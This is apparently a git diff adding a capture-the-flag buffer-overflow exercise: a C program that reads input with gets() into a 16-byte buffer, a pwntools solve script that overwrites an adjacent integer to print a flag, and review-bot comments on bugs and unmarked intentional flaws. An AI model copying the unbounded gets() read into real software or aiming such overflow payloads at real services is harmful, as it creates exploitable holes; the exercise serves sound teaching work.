diff --git a/pwn/local_target/local-target b/pwn/local_target/local-target
new file mode 100755
index 0000000..072f668
Binary files /dev/null and b/pwn/local_target/local-target differ
diff --git a/pwn/local_target/local-target.c b/pwn/local_target/local-target.c
new file mode 100644
index 0000000..f20ecdd
--- /dev/null
+++ b/pwn/local_target/local-target.c
@@ -0,0 +1,50 @@
+#include
+#include
+
+
+
+int main(){
+ FILE *fptr;
+ char c;
+
+ char input[16];
+ int num = 64;
+
+ printf("Enter a string: ");
+ fflush(stdout);
+ gets(input);
+ printf("\n");
+
+ printf("num is %d\n", num);
+ fflush(stdout);
+
+ if( num == 65 ){
+ printf("You win!\n");
+ fflush(stdout);
+ // Open file
+ fptr = fopen("flag.txt", "r");
+ if (fptr == NULL)
+ {
+ printf("Cannot open file.\n");
+ fflush(stdout);
+ exit(0);
+ }
+
+ // Read contents from file
+ c = fgetc(fptr);
+ while (c != EOF)
+ {
+ printf ("%c", c);
+ c = fgetc(fptr);
+ }
+ fflush(stdout);
+
+ printf("\n");
+ fflush(stdout);
+ fclose(fptr);
+ exit(0);
+ }
+
+ printf("Bye!\n");
+ fflush(stdout);
+}
diff --git a/pwn/local_target/solve.py b/pwn/local_target/solve.py
new file mode 100755
index 0000000..8a32702
--- /dev/null
+++ b/pwn/local_target/solve.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.pwntools
+
+from pwn import *
+
+exe = ELF("./local-target")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "saturn.picoctf.net 58138".split()
+
+def conn():
+ if args.REMOTE:
+ r = remote(ADDR, PORT)
+ else:
+ r = process([exe.path])
+
+ return r
+
+def main():
+ r = conn()
+
+ r.recvuntil(b"Enter a string: ")
+ offset = 24 # found with pwndbg
+ payload = b'A' * offset + p64(65)
+ r.sendline(payload)
+ print(r.recvall())
+ r.close()
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
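Review bot: In local-target.c, `c` is declared `char` but stores the result of `fgetc()` and is compared with `EOF`. Where `char` is unsigned the `while (c != EOF)` loop never ends, and where it is signed a 0xFF byte in flag.txt stops the read early, so the declaration should be `int c;`. The `gets(input)` call into the 16-byte `input` is presumably the exercise's intended flaw, but nothing in the file says so. A comment such as `/* intentionally unbounded read for this exercise; production code uses fgets(input, sizeof input, stdin) */` would keep it from being copied or quietly "fixed". Both `#include` lines show no header name on this page, which may be an extraction artifact, so check the file names `<stdio.h>` and `<stdlib.h>`, the latter for `exit`.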
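Review bot: In solve.py, `print(r.recvall())` waits for end-of-stream with no timeout, and `r.close()` is skipped if any earlier call raises, so a stalled or dropped connection leaves the script hanging or the tube open. Wrapping the body of `main()` in `with conn() as r:` and using `print(r.recvall(timeout=5))` bounds both. The `ADDR, PORT, *_ = "saturn.picoctf.net 58138".split()` line hard-codes what looks like a per-instance endpoint. A comment such as `# endpoint of one challenge instance; update before running with REMOTE` would say why it goes stale. `offset = 24 # found with pwndbg` is tied to the committed build of `local-target`, and the comment should say that the value has to be re-measured if the binary is rebuilt.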